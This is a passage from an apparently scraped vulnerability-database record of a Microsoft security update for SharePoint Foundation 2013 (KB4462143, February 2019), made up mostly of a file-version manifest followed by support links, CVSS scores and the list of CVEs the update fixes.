\ntbdcexap.aspx_tenantadmin| ta_exportbdcapplication.aspx| | 7749| 27-Jan-19| 11:07 \ntlropsta.aspx_tenantadmin| ta_lroperationstatus.aspx| | 3645| 27-Jan-19| 11:07 \ntconmeta.aspx_tenantadmin| ta_manageappconnectionmetadata.aspx| | 8491| 27-Jan-19| 11:07 \ntconnsec.aspx_tenantadmin| ta_manageappconnectionsecurity.aspx| | 4495| 27-Jan-19| 11:07 \ntbdcperm.aspx_tenantadmin| ta_managebdcpermissions.aspx| | 4069| 27-Jan-19| 11:07 \ncorpcat.aspx_tenantadmin| ta_managecorporatecatalog.aspx| | 6403| 27-Jan-19| 11:07 \nmktplset.aspx_tenantadmin| ta_managemarketplacesettings.aspx| | 6296| 27-Jan-19| 11:07 \nofadmin.aspx_tenantadmin| ta_officialfileadmin.aspx| | 11323| 27-Jan-19| 11:07 \nsitecdq.aspx_tenantadmin| ta_sitecollectiondiskquotadialog.aspx| | 10735| 27-Jan-19| 11:07 \nsitecown.aspx_tenantadmin| ta_sitecollectionownersdialog.aspx| | 5705| 27-Jan-19| 11:07 \nsitecper.aspx_tenantadmin| ta_sitecollectionpermissionsdialog.aspx| | 2637| 27-Jan-19| 11:07 \nsitecrep.aspx_tenantadmin| ta_sitecollectionreportsdialog.aspx| | 2637| 27-Jan-19| 11:07 \nsitecoll.aspx_tenantadmin| ta_sitecollections.aspx| | 9478| 27-Jan-19| 11:07 \napplisap.aspx_tenantadmin| ta_specificapplicensemanagement.aspx| | 27508| 27-Jan-19| 11:07 \ntviewcon.aspx_tenantadmin| ta_viewappconnections.aspx| | 8814| 27-Jan-19| 11:07 \ntbdcvwap.aspx_tenantadmin| ta_viewbdcapplication.aspx| | 16234| 27-Jan-19| 11:07 \ntbdcvwen.aspx_tenantadmin| ta_viewbdcentity.aspx| | 16454| 27-Jan-19| 11:07 \ntbdcvwli.aspx_tenantadmin| ta_viewbdclobsysteminstances.aspx| | 10289| 27-Jan-19| 11:07 \ntbdcvwlb.aspx_tenantadmin| ta_viewbdclobsystems.aspx| | 13386| 27-Jan-19| 11:07 \nvsitecp.aspx_tenantadmin| ta_viewsitecollectionpropertiesdialog.aspx| | 6189| 27-Jan-19| 11:07 \ndefault.aspx_tenantadmin| default.aspx| | 3882| 27-Jan-19| 11:07 \nonet.xml_tenantadmin| onet.xml| | 5726| 27-Jan-19| 11:07 \nthread.xsl| thread.xsl| | 34542| 27-Jan-19| 11:07 \nusercode.xsd| usercode.xsd| | 4293| 27-Jan-19| 11:07 \nvalidapp.xml| validappendpoints.xml| | 15837| 27-Jan-19| 11:07 \nvwstyles.xsl| vwstyles.xsl| | 130800| 27-Jan-19| 11:07 \nwefman.xsd| wefextensionmanifestschema.xsd| | 51975| 27-Jan-19| 11:07 \nwefma1_1.xsd| wefextensionmanifestschema1_1.xsd| | 57288| 27-Jan-19| 11:07 \nbacklink.aspx_webpagelib| backlinks.aspx| | 4069| 27-Jan-19| 11:07 \ncrtv4pgs.asx| createv4pageslib.aspx| | 3584| 27-Jan-19| 11:07 \ncreatweb.asx| createwebpage.aspx| | 10792| 27-Jan-19| 11:07 \nrecentwp.asx| recentwikipages.aspx| | 3790| 27-Jan-19| 11:07 \nversdiff.aspx_webpagelib| versiondiff.aspx| | 5692| 27-Jan-19| 11:07 \nwikiredr.aspx| wikiredirect.aspx| | 1123| 27-Jan-19| 11:07 \nonet.xml_wiki| onet.xml| | 8372| 27-Jan-19| 11:07 \nwfaction.xsd| workflowactions.xsd| | 14033| 27-Jan-19| 11:07 \nwss.xsd| wss.xsd| | 112463| 27-Jan-19| 11:07 \nbase.xml| base.xml| | 21747| 27-Jan-19| 11:07 \nsts.xml| sts.xml| | 14413| 27-Jan-19| 11:07 \nwssadmin.xml| wssadmin.xml| | 9317| 27-Jan-19| 11:07 \nresqmax.xml_0001| resourcequotamaximum.xml| | 565| 27-Jan-19| 11:07 \nresqwarn.xml_0001| resourcequotawarning.xml| | 563| 27-Jan-19| 11:07 \nowstimer.exe_0001| owstimer.exe| 15.0.4971.1000| 80608| 27-Jan-19| 11:10 \nowstimer.exe.config| owstimer.exe.config| | 481| 27-Jan-19| 11:06 \ntraceman.exe| wsstracing.exe| 15.0.4569.1501| 115904| 27-Jan-19| 11:06 \nspwriter.exe_0001| spwriter.exe| 15.0.4971.1000| 50944| 27-Jan-19| 11:06 \nstswel.dll| stswel.dll| 15.0.5111.1001| 3918424| 27-Jan-19| 11:10 \nstswfacb.dll| microsoft.sharepoint.workflowactions.dll| 15.0.4857.1000| 318728| 27-Jan-19| 11:06 \nstswfact.dll| microsoft.sharepoint.workflowactions.dll| 15.0.4857.1000| 318728| 27-Jan-19| 11:06 \nstswfaci.dll| microsoft.sharepoint.workflowactions.intl.dll| 15.0.4420.1017| 23200| 27-Jan-19| 11:06 \nisswfresources.resx| resources.resx| | 2072| 27-Jan-19| 11:07 \nisswffeature.xml| feature.xml| | 465| 27-Jan-19| 11:07 \nissuetracking.xml| issuetracking.xml| | 749| 27-Jan-19| 11:07 \nsts.workflows.dll| microsoft.sharepoint.workflows.dll| 15.0.4507.1000| 63168| 27-Jan-19| 11:07 \nworkflows_intl.dll| microsoft.sharepoint.workflows.intl.dll| 15.0.4420.1017| 13448| 27-Jan-19| 11:07 \nie50up.debug.js| ie50up.debug.js| | 152255| 27-Jan-19| 11:06 \nie50up.js| ie50up.js| | 80551| 27-Jan-19| 11:06 \nie50up.xml| ie50up.xml| | 65| 27-Jan-19| 11:07 \nie55up.debug.js| ie55up.debug.js| | 151449| 27-Jan-19| 11:06 \nie55up.js| ie55up.js| | 80012| 27-Jan-19| 11:06 \nie55up.xml| ie55up.xml| | 65| 27-Jan-19| 11:07 \nnon_ie.debug.js| non_ie.debug.js| | 101533| 27-Jan-19| 11:06 \nnon_ie.js| non_ie.js| | 59623| 27-Jan-19| 11:06 \nnon_ie.xml| non_ie.xml| | 65| 27-Jan-19| 11:07 \nbpstd.debug.js| bpstd.debug.js| | 7637| 27-Jan-19| 11:06 \nbpstd.js| bpstd.js| | 4356| 27-Jan-19| 11:06 \nbpstd.xml| bpstd.xml| | 65| 27-Jan-19| 11:07 \nctp.debug.js| ctp.debug.js| | 7406| 27-Jan-19| 11:06 \nctp.js| ctp.js| | 3934| 27-Jan-19| 11:06 \nctp.xml| ctp.xml| | 65| 27-Jan-19| 11:07 \ncvtp.debug.js| cvtp.debug.js| | 4529| 27-Jan-19| 11:06 \ncvtp.js| cvtp.js| | 2412| 27-Jan-19| 11:06 \ncvtp.xml| cvtp.xml| | 65| 27-Jan-19| 11:07 \nitp.debug.js| itp.debug.js| | 12586| 27-Jan-19| 11:06 \nitp.js| itp.js| | 9525| 27-Jan-19| 11:06 \nitp.xml| itp.xml| | 65| 27-Jan-19| 11:07 \nxtp.debug.js| xtp.debug.js| | 2979| 27-Jan-19| 11:06 \nxtp.js| xtp.js| | 1491| 27-Jan-19| 11:06 \nsts_sandbox.dll| microsoft.sharepoint.sandbox.dll| 15.0.5103.1000| 187176| 27-Jan-19| 11:06 \naddrbook.gif| addressbook.gif| | 908| 26-Jan-19| 10:36 \ncalview.gif| calview.gif| | 1615| 26-Jan-19| 10:36 \nchecknames.gif| checknames.gif| | 908| 26-Jan-19| 10:36 \nganttvw.gif| ganttview.gif| | 1625| 26-Jan-19| 10:36 \ngrid.gif| grid.gif| | 1610| 26-Jan-19| 10:36 \nicaccdb.gif| icaccdb.gif| | 231| 26-Jan-19| 10:35 \nicaccde.gif| icaccde.gif| | 222| 26-Jan-19| 10:36 \nicbmp.gif| icbmp.gif| | 355| 26-Jan-19| 10:35 \nicdoc.gif| icdoc.gif| | 231| 26-Jan-19| 10:35 \nicdocm.gif| icdocm.gif| | 236| 26-Jan-19| 10:36 \nicdocset.gif| icdocset.gif| | 221| 26-Jan-19| 10:35 \nicdocx.gif| icdocx.gif| | 224| 26-Jan-19| 10:36 \nicdot.gif| icdot.gif| | 223| 26-Jan-19| 10:35 \nicdotm.gif| icdotm.gif| | 235| 26-Jan-19| 10:36 \nicdotx.gif| icdotx.gif| | 221| 26-Jan-19| 10:36 \nicgif.gif| icgif.gif| | 220| 26-Jan-19| 10:35 \nichtmdoc.gif| ichtmdoc.gif| | 229| 26-Jan-19| 10:35 \nichtmppt.gif| ichtmppt.gif| | 227| 26-Jan-19| 10:35 \nichtmpub.gif| ichtmpub.gif| | 227| 26-Jan-19| 10:35 \nichtmxls.gif| ichtmxls.gif| | 239| 26-Jan-19| 10:35 \nicinfopathgeneric.gif| icinfopathgeneric.gif| | 216| 26-Jan-19| 10:36 \nicjfif.gif| icjfif.gif| | 214| 26-Jan-19| 10:35 \nicjpe.gif| icjpe.gif| | 214| 26-Jan-19| 10:35 \nicjpeg.gif| icjpeg.gif| | 214| 26-Jan-19| 10:35 \nicjpg.gif| icjpg.gif| | 214| 26-Jan-19| 10:35 \nicmhtpub.gif| icmhtpub.gif| | 225| 26-Jan-19| 10:36 \nicmpd.gif| icmpd.gif| | 218| 26-Jan-19| 10:35 \nicmpp.gif| icmpp.gif| | 222| 26-Jan-19| 10:35 \nicmpt.gif| icmpt.gif| | 221| 26-Jan-19| 10:35 \nicodp.gif| icodp.gif| | 354| 26-Jan-19| 10:36 \nicods.gif| icods.gif| | 369| 26-Jan-19| 10:36 \nicodt.gif| icodt.gif| | 358| 26-Jan-19| 10:36 \nicone.gif| icone.gif| | 215| 26-Jan-19| 10:35 \niconp.gif| iconp.gif| | 223| 26-Jan-19| 10:36 \nicont.gif| icont.gif| | 216| 26-Jan-19| 10:36 \nicpng.gif| icpng.gif| | 349| 26-Jan-19| 10:35 \nicpot.gif| icpot.gif| | 164| 26-Jan-19| 10:35 \nicpotm.gif| icpotm.gif| | 233| 26-Jan-19| 10:36 \nicpotx.gif| icpotx.gif| | 220| 26-Jan-19| 10:36 \nicppt.gif| icppt.gif| | 168| 26-Jan-19| 10:35 \nicpptm.gif| icpptm.gif| | 236| 26-Jan-19| 10:36 \nicpptx.gif| icpptx.gif| | 222| 26-Jan-19| 10:36 \nicpub.gif| icpub.gif| | 221| 26-Jan-19| 10:35 \nictif.gif| ictif.gif| | 355| 26-Jan-19| 10:35 \nictiff.gif| ictiff.gif| | 355| 26-Jan-19| 10:35 \nicvdw.gif| icvdw.gif| | 219| 26-Jan-19| 10:35 \nicvdx.gif| icvdx.gif| | 231| 26-Jan-19| 10:35 \nicvidset.gif| icvidset.gif| | 92| 26-Jan-19| 10:35 \nicvisiogeneric.gif| icvisiogeneric.gif| | 231| 26-Jan-19| 10:36 \nicvsd.gif| icvsd.gif| | 231| 26-Jan-19| 10:35 \nicvsdm.gif| icvsdm.gif| | 231| 26-Jan-19| 10:35 \nicvsdx.gif| icvsdx.gif| | 231| 26-Jan-19| 10:35 \nicvsl.gif| icvsl.gif| | 211| 26-Jan-19| 10:35 \nicvss.gif| icvss.gif| | 163| 26-Jan-19| 10:35 \nicvssm.gif| icvssm.gif| | 163| 26-Jan-19| 10:35 \nicvssx.gif| icvssx.gif| | 163| 26-Jan-19| 10:35 \nicvst.gif| icvst.gif| | 228| 26-Jan-19| 10:35 \nicvstm.gif| icvstm.gif| | 228| 26-Jan-19| 10:35 \nicvstx.gif| icvstx.gif| | 228| 26-Jan-19| 10:35 \nicvsx.gif| icvsx.gif| | 163| 26-Jan-19| 10:35 \nicvtx.gif| icvtx.gif| | 228| 26-Jan-19| 10:35 \nicxddoc.gif| icxddoc.gif| | 220| 26-Jan-19| 10:35 \nicxls.gif| icxls.gif| | 236| 26-Jan-19| 10:35 \nicxlsb.gif| icxlsb.gif| | 237| 26-Jan-19| 10:36 \nicxlsm.gif| icxlsm.gif| | 352| 26-Jan-19| 10:37 \nicxlsx.gif| icxlsx.gif| | 236| 26-Jan-19| 10:37 \nicxlt.gif| icxlt.gif| | 229| 26-Jan-19| 10:35 \nicxltm.gif| icxltm.gif| | 352| 26-Jan-19| 10:37 \nicxltx.gif| icxltx.gif| | 231| 26-Jan-19| 10:37 \nicxsn.gif| icxsn.gif| | 214| 26-Jan-19| 10:37 \nlg_accdb.gif| lg_icaccdb.gif| | 471| 26-Jan-19| 10:37 \nlg_accdb.png| lg_icaccdb.png| | 1634| 26-Jan-19| 10:37 \nlg_accde.gif| lg_icaccde.gif| | 479| 26-Jan-19| 10:37 \nlg_bmp.gif| lg_icbmp.gif| | 604| 26-Jan-19| 10:37 \nlg_gif.gif| lg_icgif.gif| | 501| 26-Jan-19| 10:37 \nlg_htdoc.gif| lg_ichtmdoc.gif| | 510| 26-Jan-19| 10:37 \nlg_htppt.gif| lg_ichtmppt.gif| | 484| 26-Jan-19| 10:37 \nlg_htpub.gif| lg_ichtmpub.gif| | 482| 26-Jan-19| 10:37 \nlg_htxls.gif| lg_ichtmxls.gif| | 504| 26-Jan-19| 10:37 \nlg_jfif.gif| lg_icjfif.gif| | 433| 26-Jan-19| 10:37 \nlg_jpe.gif| lg_icjpe.gif| | 433| 26-Jan-19| 10:37 \nlg_jpeg.gif| lg_icjpeg.gif| | 433| 26-Jan-19| 10:37 \nlg_jpg.gif| lg_icjpg.gif| | 433| 26-Jan-19| 10:37 \nlg_mpd.gif| lg_icmpd.gif| | 355| 26-Jan-19| 10:37 \nlg_mpp.gif| lg_icmpp.gif| | 363| 26-Jan-19| 10:37 \nlg_mpt.gif| lg_icmpt.gif| | 356| 26-Jan-19| 10:37 \nlg_png.gif| lg_icpng.gif| | 600| 26-Jan-19| 10:37 \nlg_pub.gif| lg_icpub.gif| | 462| 26-Jan-19| 10:37 \nlg_rtf.gif| lg_icrtf.gif| | 481| 26-Jan-19| 10:37 \nlg_tif.gif| lg_ictif.gif| | 604| 26-Jan-19| 10:37 \nlg_tiff.gif| lg_ictiff.gif| | 604| 26-Jan-19| 10:37 \nlg_vdx.gif| lg_icvdx.gif| | 540| 26-Jan-19| 10:37 \nlg_vsd.gif| lg_icvsd.gif| | 540| 26-Jan-19| 10:37 \nlg_vsl.gif| lg_icvsl.gif| | 482| 26-Jan-19| 10:37 \nlg_vss.gif| lg_icvss.gif| | 468| 26-Jan-19| 10:37 \nlg_vst.gif| lg_icvst.gif| | 502| 26-Jan-19| 10:37 \nlg_vstx.gif| lg_icvstx.gif| | 502| 26-Jan-19| 10:37 \nlg_vsx.gif| lg_icvsx.gif| | 468| 26-Jan-19| 10:37 \nlg_vtx.gif| lg_icvtx.gif| | 502| 26-Jan-19| 10:37 \nlg_xddo.gif| lg_icxddoc.gif| | 337| 26-Jan-19| 10:37 \nlg_xsn.gif| lg_icxsn.gif| | 323| 26-Jan-19| 10:37 \nopenfold.gif| openfold.gif| | 142| 26-Jan-19| 10:37 \nituser.gif| ituser.gif| | 1595| 27-Jan-19| 10:40 \nblueprintmtpro.eot| blueprintmtpro.eot| | 24734| 26-Jan-19| 10:37 \nblueprintmtpro.svg| blueprintmtpro.svg| | 105256| 26-Jan-19| 10:37 \nblueprintmtpro.ttf| blueprintmtpro.ttf| | 49468| 26-Jan-19| 10:37 \nblueprintmtpro.woff| blueprintmtpro.woff| | 31724| 26-Jan-19| 10:37 \nblueprintmtprolarge.png| blueprintmtprolarge.png| | 1563| 26-Jan-19| 10:37 \nblueprintmtprosmall.png| blueprintmtprosmall.png| | 1326| 26-Jan-19| 10:37 \ncalibri.eot| calibri.eot| | 167788| 26-Jan-19| 10:37 \ncalibri.svg| calibri.svg| | 365292| 26-Jan-19| 10:37 \ncalibri.ttf| calibri.ttf| | 350124| 26-Jan-19| 10:37 \ncalibri.woff| calibri.woff| | 184156| 26-Jan-19| 10:37 \ncalibrilarge.png| calibrilarge.png| | 1318| 26-Jan-19| 10:37 \ncalibrismall.png| calibrismall.png| | 1170| 26-Jan-19| 10:37 \ncenturygothic.eot| centurygothic.eot| | 60600| 26-Jan-19| 10:37 \ncenturygothic.svg| centurygothic.svg| | 165961| 26-Jan-19| 10:37 \ncenturygothic.ttf| centurygothic.ttf| | 124584| 26-Jan-19| 10:37 \ncenturygothic.woff| centurygothic.woff| | 79732| 26-Jan-19| 10:37 \ncenturygothiclarge.png| centurygothiclarge.png| | 1589| 26-Jan-19| 10:37 \ncenturygothicsmall.png| centurygothicsmall.png| | 1351| 26-Jan-19| 10:37 \ncorbel.eot| corbel.eot| | 96453| 26-Jan-19| 10:37 \ncorbel.svg| corbel.svg| | 185947| 26-Jan-19| 10:37 \ncorbel.ttf| corbel.ttf| | 200316| 26-Jan-19| 10:37 \ncorbel.woff| corbel.woff| | 106184| 26-Jan-19| 10:37 \ncorbellarge.png| corbellarge.png| | 1351| 26-Jan-19| 10:37 \ncorbelsmall.png| corbelsmall.png| | 1171| 26-Jan-19| 10:37 \nimpact.eot| impact.eot| | 56550| 26-Jan-19| 10:37 \nimpact.svg| impact.svg| | 162607| 26-Jan-19| 10:37 \nimpact.ttf| impact.ttf| | 129012| 26-Jan-19| 10:37 \nimpact.woff| impact.woff| | 76992| 26-Jan-19| 10:37 \nimpactlarge.png| impactlarge.png| | 1304| 26-Jan-19| 10:37 \nimpactsmall.png| impactsmall.png| | 1150| 26-Jan-19| 10:37 \nshellicons.eot| shellicons.eot| | 47960| 27-Jan-19| 10:40 \nshellicons.svg| shellicons.svg| | 57730| 27-Jan-19| 10:40 \nshellicons.ttf| shellicons.ttf| | 47768| 27-Jan-19| 10:40 \nshellicons.woff| shellicons.woff| | 26452| 27-Jan-19| 10:40 \ntypewriterelite.eot| typewriterelite.eot| | 27328| 26-Jan-19| 10:37 \ntypewriterelite.svg| typewriterelite.svg| | 77944| 26-Jan-19| 10:37 \ntypewriterelite.ttf| typewriterelite.ttf| | 51708| 26-Jan-19| 10:37 \ntypewriterelite.woff| typewriterelite.woff| | 30976| 26-Jan-19| 10:37 \ntypewriterelitelarge.png| typewriterelitelarge.png| | 1548| 26-Jan-19| 10:37 \ntypewriterelitesmall.png| typewriterelitesmall.png| | 1296| 26-Jan-19| 10:37 \nhelp.xml| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1025| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1026| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1029| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1030| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1032| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1033| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1035| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1037| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1038| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1043| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1044| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1045| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1048| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1050| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1051| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1053| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1054| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1055| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1057| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1058| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1060| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1061| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1062| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1063| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1066| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1081| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1086| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_1087| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_2070| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nwsshelp.xml_2074| microsoft.sharepoint.powershell.dll-help.xml| | 3657496| 27-Jan-19| 10:40 \nicvsdm.gif_14| icvsdm.gif| | 1290| 27-Jan-19| 11:07 \nicvsdx.gif_14| icvsdx.gif| | 1288| 27-Jan-19| 11:07 \nlg_icvsdm.gif_14| lg_icvsdm.gif| | 577| 27-Jan-19| 11:07 \nlg_icvsdx.gif_14| lg_icvsdx.gif| | 540| 27-Jan-19| 11:07 \npickerhierarchycontrol.js_14| pickerhierarchycontrol.js| | 126114| 27-Jan-19| 11:07 \nfldswss3.xml_14| fieldswss3.xml| | 50728| 27-Jan-19| 11:07 \ndispform.aspx_piclib_14| dispform.aspx| | 14311| 27-Jan-19| 11:07 \nmicrosoft.sharepoint.client.silverlight.dll_14| microsoft.sharepoint.client.silverlight.dll| 14.0.7006.1000| 273016| 27-Jan-19| 11:07 \nmicrosoft.sharepoint.client.silverlight.runtime.dll_14| microsoft.sharepoint.client.silverlight.runtime.dll| 14.0.7007.1000| 146040| 27-Jan-19| 11:07 \nblog.xsl_14| blog.xsl| | 40342| 27-Jan-19| 11:07 \nviewcategory.asp_blog_categories_14| viewcategory.aspx| | 13786| 27-Jan-19| 11:07 \nschema.xml_blog_comments_14| schema.xml| | 39634| 27-Jan-19| 11:07 \nviewcomment.asp_blog_comments_14| viewcomment.aspx| | 13786| 27-Jan-19| 11:07 \nviewpost.asp_blog_posts_14| viewpost.aspx| | 13786| 27-Jan-19| 11:07 \ndmslstdispform_aspx_14| dispform.aspx| | 13786| 27-Jan-19| 11:07 \ndepl.xsd_14| deploymentmanifest.xsd| | 74297| 27-Jan-19| 11:07 \ndocicon.xml_14| docicon.xml| | 14475| 27-Jan-19| 11:07 \nfldtypes.xsl_14| fldtypes.xsl| | 128231| 27-Jan-19| 11:07 \ndatepicker.debug.js_14| datepicker.debug.js| | 30848| 27-Jan-19| 11:07 \ndatepick.js_14| datepicker.js| | 20413| 27-Jan-19| 11:07 \nentityeditor.debug.js_14| entityeditor.debug.js| | 59260| 27-Jan-19| 11:07 \nentityeditor.js_14| entityeditor.js| | 38002| 27-Jan-19| 11:07 \ninplview.debug.js_14| inplview.debug.js| | 57512| 27-Jan-19| 11:07 \ninplview.js_14| inplview.js| | 39415| 27-Jan-19| 11:07 \njsgrid.debug.js_14| jsgrid.debug.js| | 785068| 27-Jan-19| 11:07 \njsgrid.js_14| jsgrid.js| | 400019| 27-Jan-19| 11:07 \nsp.debug.js_14| sp.debug.js| | 575930| 27-Jan-19| 11:07 \nsp.js_14| sp.js| | 390757| 27-Jan-19| 11:07 \nsp.ribbon.debug.js_14| sp.ribbon.debug.js| | 325227| 27-Jan-19| 11:07 \nsp.runtime.debug.js_14| sp.runtime.debug.js| | 110347| 27-Jan-19| 11:07 \nsp.runtime.js_14| sp.runtime.js| | 68791| 27-Jan-19| 11:07 \nsp.ui.rte.debug.js_14| sp.ui.rte.debug.js| | 594574| 27-Jan-19| 11:07 \nsp.ui.rte.js_14| sp.ui.rte.js| | 365926| 27-Jan-19| 11:07 \nspgantt.debug.js_14| spgantt.debug.js| | 39173| 27-Jan-19| 11:07 \nspgantt.js_14| spgantt.js| | 19338| 27-Jan-19| 11:07 \ndispform.asx_0071_14| dispform.aspx| | 13786| 27-Jan-19| 11:07 \ndispform.asx_0083_14| dispform.aspx| | 13786| 27-Jan-19| 11:07 \ndispform.asx_0082_14| dispform.aspx| | 13786| 27-Jan-19| 11:07 \ndispform.asx_0072_14| dispform.aspx| | 13786| 27-Jan-19| 11:07 \ndispform.asx_0038_14| dispform.aspx| | 13786| 27-Jan-19| 11:07 \ndispform.asx_0084_14| dispform.aspx| | 13786| 27-Jan-19| 11:07 \ndefformt.asc_14| defaulttemplates.ascx| | 170271| 27-Jan-19| 11:07 \nactredir.asx_14| actionredirect.aspx| | 896| 27-Jan-19| 11:07 \naggsetngs.asx_14| aggregationsettings.aspx| | 8163| 27-Jan-19| 11:07 \nctmark.asx_14| calltrackmark.aspx| | 211| 27-Jan-19| 11:07 \nclcnfm.asx_14| circulationconfirm.aspx| | 216| 27-Jan-19| 11:07 \ncreate.asx_14| create.aspx| | 33257| 27-Jan-19| 11:07 \ndeacfeat.asx_14| deactivatefeature.aspx| | 4240| 27-Jan-19| 11:07 \ndeletemu.asx_14| deletemu.aspx| | 188| 27-Jan-19| 11:07 \nfilter.asx_14| filter.aspx| | 1793| 27-Jan-19| 11:07 \ngbredir.asx_14| groupboardredirect.aspx| | 216| 27-Jan-19| 11:07 \niframe.asx_14| iframe.aspx| | 1494| 27-Jan-19| 11:07 \nlistedit.asx_14| listedit.aspx| | 46078| 27-Jan-19| 11:07 \nmngct.asx_14| managecontenttype.aspx| | 10409| 27-Jan-19| 11:07 \nmngfeat.asx_14| managefeatures.aspx| | 4911| 27-Jan-19| 11:07 \nmngsubwb.asx_14| mngsubwebs.aspx| | 12291| 27-Jan-19| 11:07 \ndefault.asx_mobile_14| default.aspx| | 1513| 27-Jan-19| 11:07 \nmbllogin.asx_mobile_14| mbllogin.aspx| | 5337| 27-Jan-19| 11:07 \nmblwiki.asx_mobile_14| mblwiki.aspx| | 3598| 27-Jan-19| 11:07 \nmblwp.asx_mobile_14| mblwp.aspx| | 3603| 27-Jan-19| 11:07 \npickerdialog.mas_14| pickerdialog.master| | 8739| 27-Jan-19| 11:07 \nrtedlg.mas_14| rtedialog.master| | 3153| 27-Jan-19| 11:07 \npicker.asx_14| picker.aspx| | 8613| 27-Jan-19| 11:07 \npckrrst.asx_14| pickerresult.aspx| | 3| 27-Jan-19| 11:07 \nprjsetng.asx_14| prjsetng.aspx| | 16037| 27-Jan-19| 11:07 \nreqfeat.asx_14| reqfeatures.aspx| | 3750| 27-Jan-19| 11:07 \nsrchrslt.asx_14| searchresults.aspx| | 6013| 27-Jan-19| 11:07 \nsettings.asx_14| settings.aspx| | 9565| 27-Jan-19| 11:07 \nsetwa.asx_14| setwhereabouts.aspx| | 212| 27-Jan-19| 11:07 \nsurvedit.asx_14| survedit.aspx| | 36103| 27-Jan-19| 11:07 \nvwgrpprm.asx_14| viewgrouppermissions.aspx| | 5046| 27-Jan-19| 11:07 \nviewlsts.asx_14| viewlsts.aspx| | 16520| 27-Jan-19| 11:07 \nvwstyles.xsl_14| vwstyles.xsl| | 121144| 27-Jan-19| 11:07 \ncui.debug.js| cui.debug.js| | 646903| 27-Jan-19| 11:06 \ncui.js| cui.js| | 362624| 27-Jan-19| 11:06 \nmicrosoft.web.commandui.dll| microsoft.web.commandui.dll| 15.0.5085.1000| 134976| 30-Jan-19| 02:28 \nmicrosoft.web.commandui.dll_0001| microsoft.web.commandui.dll| 15.0.5085.1000| 134976| 30-Jan-19| 02:28 \nxlsrv.commandui.dll| microsoft.web.commandui.dll| 15.0.5085.1000| 134976| 30-Jan-19| 02:28 \n \nHow to get help and support for this security updateHelp for installing updates: [Protect yourself online](<https://www.microsoft.com/safety/pc-security/updates.aspx>) \n \nHelp for protecting your Windows-based computer from viruses and malware: [Microsoft Security](<http://support.microsoft.com/contactus/cu_sc_virsec_master>) \n \nLocal support according to your country: [International Support](<https://www.microsoft.com/en-us/locale.aspx>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-02-12T00:00:00", "type": "mskb", "title": "Description of the security update for SharePoint Foundation 2013: February 12, 2019", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-0594", "CVE-2019-0604", "CVE-2019-0670"], "modified": "2019-02-12T00:00:00", "id": "KB4462143", "href": 